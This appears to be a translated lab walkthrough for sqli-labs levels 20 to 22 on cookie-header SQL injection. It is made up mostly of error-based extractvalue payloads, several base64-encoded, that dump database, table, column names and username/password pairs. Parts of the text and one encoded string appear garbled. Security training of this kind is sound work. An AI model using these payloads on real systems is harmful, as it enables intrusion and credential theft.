Cookies
Cookie injection is a little different from other Header injections
Cookie: The browser sends a cookie when it sends a request to the server, or the server attaches a cookie to the browser, which is where the cookie is placed. For example: Cookie:user=admin
Source code If you set a cookie, the following statement will be executed
will not execute:
Less-20
Log in to an account, Hackbar LOAD command or Burp Suite to capture packets
Closing character: ‘$cookee’
Query the current database:
Dumb' or extractvalue(1,concat(0x7e,database())) # #uname=Dumb This can be filled in casually, it will not affect extractvalue()
Query the tables under the current database:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
Query the fields of the current table:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
Query data:
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) # Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
Less-21
base64_decode(), base64 decode it
Log in to an account, use the Hackbar LOAD command, first decode the = url (taken from the web page) and then base64 decode it, that is Dumb
Closing character: (‘$uname’)
Query the current database:
Dumb') or extractvalue(1,concat(0x7e,database())) # base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj
Query the table of the database:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) # base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj
Query the fields of the current table:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) # base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==
Query data:
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) # Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) # ... base64: Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=
Less-22
changed closing character
Log in to an account, Hackbar LOAD command or Burp Suite to capture packets, RHVtYg==, =(url code=), namely Dumb
Jump back to Less-21 here, the file name in the address bar has changed to LEss-22
Closing character: “$cookee1”
Query the current database:
Dumb" or extractvalue(1,concat(0x7e,database())) # base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==
Query the tables of the current database:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) # base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==
Query the fields of the current table:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) # base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj
Query data:
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) # Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) # ... base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0yMSkpSA RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge MySQL entry skill tree Database composition Table 44914 people are studying systematically